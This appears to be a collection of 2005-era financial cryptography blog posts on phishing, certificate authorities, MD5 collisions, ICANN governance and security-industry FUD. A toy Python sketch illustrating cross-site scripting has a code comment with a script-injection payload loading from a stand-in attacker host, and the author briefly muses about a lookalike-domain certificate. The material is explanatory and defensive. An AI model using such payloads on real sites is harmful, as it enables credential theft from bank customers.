Maybe there's hope for Microsoft yet ... they are reported as saying nothing at all about IE 7.0 security upgrades for phishing.
There's no hope for Sun.
They recently announced yet another set of licences (1 2 3), still lumbered with the core requirement of making it difficult to share Java. Lack of shareability makes porting the language to platforms a Sisyphean task. As open source volunteers slave at the onerous and unpaid task of getting compilers bootstrapped and working, they cannot release their binary results; each unpaid volunteer is locked into pushing their own stone up the hill until someone pays the Sun Gods to let them join together and push up one stone.
The time taken to push Java from new release source through installed binary and then get some packages out to the users is about the same as the gap between major releases. There is rarely a time when users on open source platforms feel the language is stable - hardly a reward for adoption. The stone rolls down again, and Sun are trapped in the eternal punishment of their "Write once, Run twice" arrogance.
Over at Mozilla, the luster of the unknown is rapidly tarnishing off Firefox. Here's an article by someone who bothered to go looking at the security. Conclusion? More of the same.
Following on from the Choicepoint debacle, two of America's banking regulators - the FDIC and the OCC - have decided that financial institutions must warn customers of security breaches [1]. It seems that 6% of America's bank customers have already sent their banks a similar message.
I checked in to ICANN to see if there was any news on the .net TLD since Adam and I wrote in some comments on conflict of interest, and lo and behold, there is! Not on the results, but on the process. ICANN has engaged Telcordia as an independent advisor to lead a team of DNS experts in evaluating the 5 contenders.
"Telcordia's Dr. David Sincoskie will lead a team that possesses 270 years of collective industry experience, with particular emphasis in networks, information databases, security and operations. Evaluation team demographics include two IEEE Fellows; a member of the National Academy of Engineering; a multi-cultural/multi-national composition, with nationals of Croatia, Greece, Pakistan, Taiwan, the UK and the US. In addition, 60% of the team possesses PhDs, spanning CS, EE and Economics;"
Heavy hitting!
It certainly makes sense to engage an independent team to do this evaluation, especially given the bitchy environment and the underlying challenge to the US Department of Commerce's benevolent dictatorship. This could give new meaning to the process, taking it into an era of open governance.
Some questions remain - it's not that easy to score well on open governance. Who are Telcordia, and why are they independent? ICANN is again one step ahead there (are you shocked already?) and has published an "Advisory Regarding Neutrality of Independent Evaluators":
"Telcordia Technologies is a wholly-owned subsidiary of Science Applications International Corporation (SAIC). Previously known as Bellcore, on November 17, 1997 SAIC acquired Bellcore and renamed the company Telcordia Technologies."
Bellcore! Related to the old AT&T Bell Labs? Or the System V guys? Well that should be just the ticket.
But wait, who are they owned by? SAIC? Now there's a problem. If you had to pick any player who was even more locked into Beltway politics than VeriSign, it would be SAIC. So, notwithstanding that half of the disclosure is full of reasons why SAIC has nothing to do with this deal, that's a matter of concern. On the watch list.
On balance we are still within the realms of open governance. ICANN have published their disclosure, and the more uncomfortable the disclosure is, the more valuable it becomes. That leaves three open questions:
The first question is actually addressed but not answered in their real FAQ on the process.
Somewhere I saw that the end of March is the time for the report from the advisors. We haven't got long to wait to see if ICANN delivers a copybook case of open governance.
We don't often get the chance to do the Rip van Winkle experience, and this makes Christopher Allen's essay on how he returned to the security and crypto field after exiting it in 1999 quite interesting.
He identifies two things that are in common: Fear and Gadgets. Both are still present in buckets, and this is a worry, says Christopher. On Fear:
"To simplify, as long as the risks were unknown, we were in a business feeding off of 'fear' and our security industry 'pie' was growing. But as we and our customers both understand the risks better, and as we get better at mitigating those risks cheaply, this "fear" shrinks and thus the entire 'pie' of the security industry becomes smaller. Yes, new 'threats' keep on coming: denial-of-service, worms, spam, etc., but businesses understanding of past risks make them believe that these new risks can be solved and commodified in the same way."
The observation that fear fed on unknown risks is certainly no surprise. But I find the conclusion - that as the risks became better understood, the pie shrank - to be a real eye-opener. It's certainly correlated, but it misses a world of causality: fear is and was the pie, and now the pie buyers are jaded.
I've written elsewhere on what's wrong with the security industry, and I disagree with some of Christopher's assumptions, but we both end up at the same question (with a nod to Adam's question): how indeed to sell a viable, real security product into a market where, statistically, we are probably selling FUD?
Addendum: Adam's signalling thread: from Adam: 1, 2. From Iang: 1, 2
Following on from discussions on peer-reviewed papers, I checked an up-and-coming conference (Econ & Security), and here's a proposal:
Take a paper and blog it in some fashion. (Perhaps limit the blog entry to the abstract and a link to the full paper.) Then, open the blog entry for comments and trackbacks.
Hey presto, we have peer review but not peer gatekeeping. (So far this was all Adam's idea.) We can also include substantial milestones such as major review periods, closing off one blog entry and shifting to another when the author has enough material to rewrite.
Reputation is built in: over time, the volume of attention should indicate the importance of the work. Let's draw a line in the sand and say that papers should be licensed under a Creative Commons licence.
Now, blogs already do this. But they are spontaneous, free-flowing and full of spelling errors. So in order to turn the blog into a weightier forum suited to the gravity of academia, we could put some links on the blog front page indicating the papers under the spotlight.
Has anyone got an FC paper ready to roll? As Digital Money and the FC conference have just passed, and Econ & Security is closed, there seems to be a bit of a hole for the next 6 months in the peer review process. I would point out that the workshop on Electronic Contracting is open for another month. Oops, no, it's closed too. Double-oops - it's cancelled for lack of critical mass! Well, that just goes to show how hard the conference game is, having been there myself.
Having said that, in general, most of these conferences presume that Internet discussion does not count as publication. So you can have the best of both worlds: take advantage of a blog peer-review forum to hone your argument, then go for old world dead tree publication as well. (As long as you are careful not to muck up the licensing...)
fm points at developments in the anti-phishing battle (extracted below), only unexpected if you had not read an earlier entry on the Crooked Black Claw.
It seems that Netcraft are having some success in aggregating the information collected from their toolbar community into an early warning sign of where phishers are heading. Reportage from them: online banking is being attacked by cross-site scripting. This is distinct from traditional phishing in that it does now bring the bank and ecommerce site (note to Niham!) into the loop. Yet only in a small way; close that loophole and the bank is out of the defence business again.
Yet more important is the structural shift being signalled here.
Netcraft pushed out their toolbar back in the closing days of 2004. Now they can use this info, a scant 10 weeks later. This changes the balance of power in cert-based security, and CAs will be further marginalised by this development. Here's the article, followed by more observations:
Online Banking Industry Very Vulnerable to Cross-Site Scripting Frauds

Phishing attacks reported by members of the Netcraft Toolbar community show that many large banks are neglecting to take sufficient care with the development and testing of their online banking facilities.

Well known banks have created an infestation of application bugs and vulnerabilities across the Internet, allowing fraudsters to insert their data collection forms into bona fide banking sites, creating convincing frauds that are undetectable to most customers. Indeed, a personal finance journalist writing for The Motley Fool was brave enough to publicly admit to having fallen for a fraud running on Suntrust's site and having her current account cleaned out. It's a reasonable premise that if a Motley Fool journalist can fall for a fraud, anyone can.

One fraud recently blocked by the Netcraft Toolbar was at Citizens Bank. Fraudsters composed and mass mailed a phishing mail which exploited a program on CitizensBank.com, loading Javascript from the attackers' server hosted at Telecom Italia. Customers were presented with a page bearing the CitizensBank.com URL in the address bar, while the browser window displays a form from the Telecom Italia server asking for user login information.

The script being exploited allows visitors to search for Citizens Bank branch offices in their town. Along with search scripts, branch locator pages are frequently carelessly coded and are targets for fraudsters who are actively analyzing financial web sites for weaknesses.
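To make the class of bug concrete, here is a toy Python sketch of a branch-locator handler - my own invention, not the actual CitizensBank.com code:

```python
from html import escape

def branch_locator_page(town):
    """Toy branch-locator handler, showing the bug class only."""
    # The vulnerable version would be:  f"<h1>Branches in {town}</h1>"
    # A mailed link like  ?town=<script src=//attacker.example/login.js></script>
    # then runs the attacker's login form under the bank's own URL.
    return f"<h1>Branches in {escape(town)}</h1>"  # escaping output closes the hole
```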
Another thought occurred to me. I wrote last night in Mozilla's bug-fix forum that "there is no centralised database of certs by which a CA can know whether an application for a new cert is likely to conflict" (paraphrased). This is because CAs do not cooperate and will never cooperate at that level (as customer theft would be the obvious result).
This balkanisation of CAs means that any security fixups must align with those borders. An attack on an ecommerce site using certs will come via another CA. If I were to attack GMail, I wouldn't go to Equifax for my cert, I'd go to Comodo. Or VeriSign, or some other... (And yes, I'd ask for GMall.com and present my forged paperwork for that company. But let's skip over the boring details of how we trick a CA.)
So it is crucial that the browser shows which CA signed the cert - along with other things, as suggested here by Peter Gutmann in a discussion on how to detect and discriminate rogue CAs, a priori:
In other words, this problem [of differentiating between "high" assurance and "low" assurance] is way, way up in the political layer, and I can't see any way of resolving it. It'd certainly be a good idea to make some distinction, but it's not a productive area to apply effort. It'd be better to look at some of the work on secure UI design (e.g. anything by Ka-Ping Yee, Simson Garfinkel's thesis, etc etc). Work on the stuff that's solvable and leave this one as a honeynet for the bureaucrats to prevent them from causing any damage elsewhere.

Two other bits that I should mention:
- Make Herzberg et al's TrustBar a default, built-in part of the browser.
- Go to http://www.gerv.net/security/a-plan-for-scams/ and implement the entire list.
That will do more for security than any certificate-nitpicking ever will (the anti-phishing list at Gerv's site should be adopted as the #1 - #5 security features to be added to Mozilla/Firefox). After you've implemented those, you can still work on the titanium-plated kryptonite certificate support. Conversely, no amount of diamond-studded iridium certificates will do you any good without anti-phishing/spoofing measures like the above being used.
Peter.
If there is a God of Cryptoplumbing, then Peter Gutmann is he, and he has spoken. We now seem to be on our way to a manifesto of ideas. Perhaps we should take that further...
Getting back to the crucial point here: I claimed there was no centralised database. But it turns out that there is a database - the net. Sure, it ain't centralised, but (and here's the clanger) it is trawled on a daily basis for certs. By at least two parties that I know of: Netcraft and SecuritySpace. And as a consequence both of these parties have (implied) centralised databases, and the ability to answer the question "is this new application for a cert likely to be a phishing attack?"
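Here's a sketch of the kind of question such a database could answer, in Python. The names and the threshold are mine, and a real checker would also fold in homoglyphs, hyphens and the like:

```python
from difflib import SequenceMatcher

# A toy "trawled" database; in reality this would be Netcraft/SecuritySpace scale.
known_cert_names = ["gmail.com", "paypal.com", "citizensbank.com"]

def looks_like_phish(applied_name, threshold=0.85):
    """Flag a cert application suspiciously close to a name already in use."""
    applied = applied_name.lower()
    return [known for known in known_cert_names
            if known != applied
            and SequenceMatcher(None, applied, known).ratio() >= threshold]

print(looks_like_phish("gmall.com"))   # ['gmail.com'] -- worth a human look
```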
Now, if you are a net techie, that will likely be a puerile observation. But if you are the CEO of a Certificate Authority, the ground just rumbled under your feet. If these two players can pull this off, then the CA just got so marginalised that the commoditisation we've seen with Comodo and GoDaddy, and also with CAcert in a different direction ... well, all that falls into the class of "you ain't seen nothing yet!"
Which leads me to my final observation. (Techie warning: what follows is all bizspeak, sorry about that.) As CAs are inevitably marginalised by the above development, and by their failure to protect the net from the rise of phishing - a direct MITM on the browser - the big-bucks players will rethink their strategy. That of course means VeriSign.
There are two possible paths here. Path One is that the branding opportunities turn up in time (watch Microsoft here) for the CA business to reverse its fortunes and become a media-space player. In this scenario, players spend on advertising and start to build their brands around quality and security (which means taking a proactive approach to watching applications for certs). But they can only do this if a) the branding turns up, b) they can get more investment, and thus c) they can show a massive market increase, and thus d) the commodity certificate leads to a discriminated marketplace of much greater size.
That's not as far off as we think, as part a) also leads to part d) in market terms.
Then there is Path Two. Phishing gets bigger, and some poor Alice in the US loses her house over it. Her attorneys say "this can't go on, and we can help you stop it!" (Proving that the USA leads in genetic engineering, her attorneys lack any capability to say "I don't know / I can't help you.")
Boom, a class action suit on phishing is filed against the bank, the browser manufacturer, the cert suppliers (both, or all) and, to cap things off, the people who designed the system. The potential class size is about 1 million Americans, give or take. Total losses are in the billions, over a few years. Add punitive damages if it goes badly and the case shows that the architects should have known better.
Potential payout is from 100m to 10b, depending. So it is big enough to encourage salivation, but it's also big enough to break any but the bank players (who themselves are just victims so they aren't likely to lie down and die) and Microsoft.
Now, cast all these ingredients into the pot and what do you have? The cards just got totally reshuffled on the CA business. Which means that the biggest player, Verisign, will have the biggest problem. This is compounded (should I say exponentiated?) by several issues:
Against that we have an uncertain and never fully monetarised synergy from certs, domains, NetDiscovery and lots of other "strategic control" businesses under the umbrella.
To me, this says one thing: VeriSign will sell the CA business. They will do it to limit the damages from future litigation, and because the ground is shifting too fast for their complex business to benefit from it. Further, CAs as "strategic controls" are being marginalised. The CA business is no longer core, and it's darn risky.
That's my call! Analysts charge top dollar for this - what's your bet?
Hyperion's Digital Money Forum is on Wednesday and Thursday. Dave Birch runs an engaging show for financial cryptographers, and it is well worth the two days if you can get to London. At £275, it doesn't break the bank.
(I guess they'll take late bookings.) The schedule is on the site, but it is in PDF.
Wang and Yu have released their draft paper(s) for Eurocrypt 2005:
Xiaoyun Wang and Hongbo Yu, "How to Break MD5 and Other Hash Functions"
Xiaoyun Wang and Hongbo Yu, "Cryptanalysis of the Hash Functions MD4 and RIPEMD"
Meanwhile, Vlastimil Klima has released a draft on his research trying to reverse engineer the Shandong team's results. Whereas the Shandong team managed MD5 collisions in one hour on their IBM P690 supercomputer, Klima claims he can do a collision, using different techniques, in only 8 hours on his 1.6GHz laptop!
V. Klima, Finding MD5 Collisions - a Toy For a Notebook
And, expect this to improve, Klima says, when the two differing techniques are compared and combined.
What does this mean, especially considering my earlier post on cryptographer's responsibility?
It is now easy to find two junk documents that hash to the same MD5 value. This is a collision attack. But it remains harder to find a valid attacking document that hashes to the same MD5 as a given target document. This is called a pre-image attack, and it is far more serious.
Further, it remains harder still to breach a protocol that relies on other things. But do move from MD5 with due haste: if collisions are easy to find, then pre-images can't be that far behind. And once we have pre-images, we can substitute real live key pairs into the certs attack described earlier today.
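To put rough numbers on that gap, here is a toy sketch of my own - plain brute force, nothing like the analytic techniques in the papers - using MD5 truncated to 24 bits so both searches finish on a laptop. A birthday-style collision on an n-bit digest costs around 2^(n/2) tries; a pre-image costs around 2^n.

    import hashlib
    from itertools import count

    def trunc_md5(data, nbits=24):
        # Truncated MD5 stands in for a weak hash so brute force finishes.
        return hashlib.md5(data).digest()[: nbits // 8]

    def find_collision(nbits=24):
        # Birthday search: roughly 2**(nbits/2) tries (~4,000 here).
        seen = {}
        for i in count():
            msg = b"junk-%d" % i
            digest = trunc_md5(msg, nbits)
            if digest in seen:
                return seen[digest], msg
            seen[digest] = msg

    def find_preimage(target, nbits=24):
        # Pre-image search: roughly 2**nbits tries (~16 million here).
        for i in count():
            msg = b"forge-%d" % i
            if trunc_md5(msg, nbits) == target:
                return msg

The collision search returns almost instantly; the pre-image search grinds for thousands of times longer. That factor, scaled up to full 128-bit MD5, is the distance between today's results and a forged-document attack.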
A security model generally includes the human in the loop; totally automated security models are generally disruptable. As we move into our new era of persistent attacks on web browsers, research on human failure is very useful. Ping points to two papers, done around 2001, on what web browsing security means to users.
Users' Conceptions of Web Security (by Friedman, Hurley, Howe, Felten, Nissenbaum) explored how users treat the browser's security display. Unsurprisingly, non-technical users showed poor recognition of spoof pages, judging by the presence of a false padlock/key icon. Perhaps more surprisingly, users derived a different view of security: they interpreted security as meaning it was safe to put their information in. Worse, they tended to derive this sense of safety as much from the presence of a form as from the padlock:
"That at least has the indication of a secure connection; I mean, it's obviously asking for a social security number and a password."
Which is clearly wrong. But consider the distance between what is correct - the web security model protects the information on the wire - and what is relevant to the user. Users want to keep their information safe from harm, any harm, and they will assume that any signal sent serves that end.
But as the threat to information is almost entirely at the end node, and not on the wire, users face an odd choice: interpret the signal according to the harms they know about, which is wrong, or ignore the signal because it is irrelevant to those harms, which is unexpected.
It is therefore understandable that users misinterpret the signals they are given.
The second paper, Users' Conceptions of Risks and Harms on the Web (by Friedman, Nissenbaum, Hurley, Howe, Felten), is also worth reading, but it was conducted in a period of relative peace. It would be very interesting to see the same study conducted again, now that we are in a state of perpetual attack.
I see signs of a wave of FUD spreading through the net as cryptoplumbers try to interpret the latest paper on MD5 collisions in certs from Lenstra, Wang and de Weger. I didn't have time to read the paper when it appeared, and wasn't easily able to divine from the chit-chat what the result meant. When the dust settled, this was not an attack, but many assumed it was.
Why? Because it wasn't explained, either in the paper or anywhere else that I read. Reading the paper, the closest I came to a limitation on damage in human language was this:
``The RSA moduli are secure in the sense that they are built up from two large primes. Due to our construction these primes have rather different sizes, but since the smallest still are around 512 bits in size while the moduli have 2048 bits, this does not constitute a realistic vulnerability, *as far as we know*.''
The last part (my emphasis) may seem pretty clear, but the reasoning behind it is inaccessible to non-cryptographers. Further, it is buried deep: the key phrase is not in the abstract or conclusion, nor on the more accessible HTML page.
Now, in all probability the authors would be surprised to learn that non-cryptographers read these papers. That's because most of the output from cryptology is normally of no importance to the outside world - small improvements and small suggestions. And, frankly, it's economic for us all to let the people doing the work get on and do it without the distraction of the real world.
This time is different, however. The Wang, Yin, Yu results go beyond the limited world of cryptography: they have shifted the security statement of a large class of algorithms that we previously trusted and relied upon. This time we are all affected, and those who understand have a responsibility to explain the real significance of the results.
Here is my own limited interpretation:
The paper describes how to create a false or forged certificate based on MD5. But what it does not seem to say is that the key within the certificate can be forged, neither in private key form nor in useful public key form (on this last point I am not sure).

Without the private key, the certificate cannot take part in a normal signature protocol. That's the point of the public key: to prove that the other party has control of the private key.
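The proof-of-possession point can be seen with toy RSA numbers - an illustration of mine, hopelessly insecure and nothing to do with the paper's construction. Anyone holding the certificate can verify; producing the signature needs the private exponent, which needs the factors.

    # Toy RSA with tiny primes -- illustration only, hopelessly insecure.
    p, q = 10007, 10009                 # the factors an attacker lacks
    n, e = p * q, 65537                 # (n, e) is the public key in the cert
    d = pow(e, -1, (p - 1) * (q - 1))   # private exponent: requires p and q

    challenge = 42
    signature = pow(challenge, d, n)          # signing needs d
    assert pow(signature, e, n) == challenge  # verifying needs only the cert

A certificate forged without the matching d hands the attacker only the verifying half, which is no use in the handshake.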
Which means no attack, as yet, in general. Yes, we should with all due speed deprecate MD5 in the production of certificates, but we are a long way from seeing the situation turn into an economic attack.
Addendum: But it looks like I got it wrong in detail. See cypherpunk's comment below, which explains how it is. We do concur on the result, though - no attack.
So where's the danger? People on the net are drawing out the unexplained results and assuming that things are totally broken. And that crosses the line into FUD.
It may be that encouraging a sense of Fear, Uncertainty and Doubt will help the Internet run like scared lemmings away from the now weakened MD5 hash. It may help build emphasis towards what we need - a serious effort to construct a new theory of message digest functions along the lines of NIST's AES competition.
But, more than likely, FUD will do what it has always done: spread confusion and cause people to make bad decisions. And, as those bad decisions are often made in the direction of the spreaders of FUD, we must understand that there is a financial benefit to those spreading FUD. More sales, more exposure.
This is not responsible behaviour. Now, to be clear, the primary authors of this paper are focused on the result, and we understand that distractions of dotting the i's and crossing the t's will slow down the real work. But those of us who are not involved in the creation of the new result have a duty to explain and teach, rather than steal the limelight.
Cryptographers as scientists, and wider security specialists as advisers, have a duty to deliver value in terms of security, not sales. We all have to be on watch for the temptation to use FUD as the easy way to sales. In the long run, spreading FUD and reaping easy sales results in a mess that we as the security community have to clean up.
Worse, it spreads the notion that cryptography and security, as a science and a specialisation, are not worth listening to, because whatever we say next time has to fight the failure of last time. Selling FUD now means we are damned to sell snake oil forever.
Stefan writes:
"Back in 1996–1998, I worked in my spare time on a book titled Electronic Money and Privacy. Due to career priorities from 1999 onward, I never got around to finishing the book alas. Since I will not have any time in the foreseeable future to get back to working on the book, I am hereby making the first four draft chapters freely available."
My own story is similar. Back in 97 or so I started a book with a working title of FC. In 98 I rewrote it along the lines of the then evolving 7 layer model of financial cryptography. Unfortunately I did not get the time to wrap the book up, and it remains somewhat incomplete.
Perhaps I should put it on the net. I recently put all my draft papers up on the net, as some are a year or more old and aren't getting closer! Comments? Maybe there is too much stuff on the net already ...
In the ongoing thread of Adam's question - how do we signal good security - it's important to also list signals of bad security. CoCo writes that Tegam, a French anti-virus maker, has secured a conviction against a security researcher for reverse engineering and publishing weaknesses.
This seems to be a signal that Tegam has bad security. If they had good security, then why would they care what a security researcher said? They could just show him to be wrong. Or fix it.
There are two other possibilities. Firstly, Tegam has bad security, and they know it. This is the most likely, and their aggressive focus on preserving the revenue base would perhaps lead them to prefer suppression of future research into the product. CoCo points to a claim that Tegam accused the researcher of being a terrorist in a French advertisement, which indicates an attempt to disguise the suppression and validate it in the minds of their buying public. (The advertisement is in French, and Google translates it into quixotic English.) Tegam responds that this article makes their case, but comments by flacks do no such thing. Still, the response makes for interesting reading and may balance their case.
Alternatively (secondly), they just don't know. And I don't think we need to spell out the proof that "don't know" is equivalent to "insecure."
CoCo also comments on how the chilling effect will raise insecurity in general. But if enough companies decline to pursue avenues of prosecution, this might balance out in our favour: we might then end up with a new signal of those that prosecute and those that do not.
Texas Instruments recently signalled a desire for good security in the RFID breach, as well as an understanding of the risks to the user. Tegam has signalled the reverse. Are they saying that their product has known weaknesses, and that they wish to hide these from the users? You be the judge, and while you're at it, ponder which side of this fence your own company sits on.
FCers will recognise the confusion in this article by Kevin Kelleher about how to analyse eBay + Paypal:
"Here's a little-known fact about eBay (EBAY:Nasdaq) : It's not one of the most successful e-commerce companies in the world.It's actually two of the most successful e-commerce companies in the world -- eBay, the global network of auction and retail sites, and PayPal, its online-payment technology subsidiary that fuels the bulk of eBay transactions. Of the two, PayPal may emerge as the bigger phenomenon in the long run."
FCers see further than trying to model a payment system as a bank: it is a financial cryptography system that happens to have branded its Value structure. The Finance component is the auction, and the fact that the two companies grew up apart and together is a simple reflection of the FC observation that you need both the finance and the value.
Jim points at this article by Ivan Schneider on the attempts of airlines to reduce payment cost.
Airlines Aim for Expense Reduction in Payments
...
After labor and fuel, the passenger airline industry's largest expenses involve distribution costs. These are comprised of travel agency commissions, fees to global distribution systems such as Sabre and finally, the merchant discount rate paid to their banks.
Already, the airlines have effectively slashed their distribution costs through hard negotiations with travel agencies and the global distribution systems, yielding a 26 percent decrease in average annual distribution costs from 1999 to 2002, according to Edgar, Dunn & Company (EDC, Atlanta), a financial-services and payments consultancy.
Now, the airlines are targeting the estimated $1.5 billion it spends on accepting credit cards from its customers. "The airlines definitely have payments on their radar screens," says Pascal Burg, a San Francisco-based director at EDC. "They used to look at accepting cards and paying merchant fees as the cost of doing business, and now they're trying to proactively manage the cost associated with doing payments."
The first approach is for an airline to have a friendly chat with its affinity card co-brand partner. But that's often a difficult conversation to have, both for the bank and for the airline. "Traditionally, the co-brand relationships have been managed in the marketing department, while the acquiring merchant side has been handled through the corporate treasury," says Thad Peterson, also a director at EDC.
...
http://www.banktech.com/news/showArticle.jhtml?articleID=60401062
Vince Cate (writes Ray Hirschfeld) created a stir a number of years ago by relocating to the Caribbean island nation of Anguilla, purchasing a Mozambique passport-of-convenience, and renouncing his US citizenship in the name of cryptographic and tax freedom.
Last Thursday I attended a ceremony (the first of its kind in Anguilla) at which he received his certificate of British citizenship.
But Vince's solemn affirmation of allegiance to Queen Elizabeth, her heirs and successors was done for practical rather than ideological reasons. Since he gave up his US citizenship, the US has refused to grant him a visa to visit his family there, or even to accompany his wife to St. Thomas for her recent kidney surgery. Now, as a British citizen, he expects to qualify for the US visa waiver program.
Is this the end of an era, a defining cypherpunk moment?
Hop on a plane, land, and discover Adam has posted 13 blog entries, including one that asks for more topics! Congrats on 500 posts! He posts on some testimony: "the only part of our national security apparatus that actually prevented casualties on 9/11 was the citizenry." More on security measurements ("fundamentally flawed"). Tons of stuff on ChoicePoint.
Axel talks about what it means to be a security professional. Yes, there are some media stars out there, but remember "don't believe Vendor pitches." Sounds like something I would write.
Scott points at an article on the inside story of how plastic payments are battled over in Australia. Sadly, the article requires yet another subscription to yet another newspaper that you read only once, and they keep your data forever. No thanks.
Stefan does some critical analysis of pseudonyms; very welcome, as there is an absence of good stuff on this. A must-read for me, so remind me please... Meanwhile, he comments that laws won't help identity theft, but "Schwarzenegger's administration ... should point legal fingers ... at organizations that hold, distribute, and make consumer-impacting decisions based on identity information..." It is correct to recognise that the problem lies fundamentally with using the identity as the "hitching post" for everything in the future, but finger-pointing isn't going to help. (It's a case of the One True Number.) More on that later, when I've got my draft exposé on finger-pointing in reasonable shape.
In terms of definitions for FC, applying crypto to banking and finance doesn't work. Mostly because those doors are simply closed to us, but also because that's not how applications are built. And this brings us to the big difference between Bob's view and FC7.
In Bob's view, we use crypto on anything that's important or valuable - which is much more open than, say, the 'bank' view. But this is still bottom-up thinking, and it is in the implicit assumption of crypto that the trouble lies.
Applications are driven top down. That means, we start from the application, develop its requirements and then construct the application by looking downwards to successively more detailed and more technical layers. Of course, we bounce up and down and around all the time, but the core process is tied to the application, and its proxy, the requirements. The requirements drive downwards, and the APIs drive upwards.
Which means that the application drives the crypto, not the other way around. Hence it follows that FC might include some crypto, or it might not - it all depends on the app! In contrast, if we assume crypto from the beginning, we're building inventions looking for a market, not solving real world problems.
This is at heart one of the major design failures in many systems. For example, PKI/SSL/HTTPS assumed crypto, and assumed the crypto had to be perfect. Now we've got phishing - thanks guys. DigiCash is the same: start from an admittedly wonderful formula, and build a money system around it. Conventional and accepted systems building practices have it that this methodology won't work, and it didn't for DigiCash. Another example is digital signatures. Are we seeing the pattern here? Assume we are using digital signatures. Further assume they have to be the same as pen&ink signatures.... Build a system out of that! Oops.
Any systems methodology keeps an open mind on the technologies used, and that's how it is with FC7. Unlike the other definitions, it doesn't apply crypto, it starts with the application - which we call the finance layer - and then drives down. Because we *include* crypto as the last layer, and because we like crypto and know it very well, chances are there'll be a good component of it. But don't stake your rep on that; if we can get away with just using a grab bag of big random numbers, why wouldn't we?
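For flavour, here is a minimal sketch of that habit of mind - names invented for illustration, not any real FC7 codebase. The finance layer states what it needs; the value layer underneath is free to satisfy it with heavy crypto or with nothing more than big random numbers.

    import secrets
    from abc import ABC, abstractmethod

    class ValueLayer(ABC):
        """Whatever the requirements say carries value. The interface is
        fixed from above; the mechanism below stays open."""
        @abstractmethod
        def transfer(self, src, dst, amount): ...

    class RandomNumberLedger(ValueLayer):
        """No crypto at all: unguessable receipt identifiers suffice."""
        def __init__(self):
            self.balances = {}
        def transfer(self, src, dst, amount):
            self.balances[src] = self.balances.get(src, 0) - amount
            self.balances[dst] = self.balances.get(dst, 0) + amount
            return secrets.token_hex(16)    # receipt id, nothing more

    class AuctionApp:
        """Finance layer: drives the requirements downward. It asks for
        a settled transfer and a receipt; it never asks for a cipher."""
        def __init__(self, ledger):
            self.ledger = ledger
        def settle(self, winner, seller, price):
            return self.ledger.transfer(winner, seller, price)

If the requirements later demand unlinkability, swap in a blinded-token ledger; the auction code above never changes.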
And this is where FC7 differs from Bob H's view. The process remains security-oriented in nature. The people doing it are all steeped in crypto; we all love to add in more crypto if we can possibly justify it. But the goal we drive for is the goal of an application, and our solution is fundamentally measured on meeting that goal. Indeed, elegance is not found in sexy formulas, but in how little crypto is included to meet that goal, and how precisely it is placed.
The good news about FC7 is that it is a darn sight more powerful than the 'important' view, and a darn sight more interesting than the banking view. You can build anything this way - just start with an 'important' application (using Bob's term) and lay out your requirements. Then build down.
Try it - it's fun. There's nothing more satisfying than starting with a great financially motivated idea, and then building it down through the layers until you have a cohesive, end-to-end financial cryptography architecture. It's so much fun I really shouldn't share it!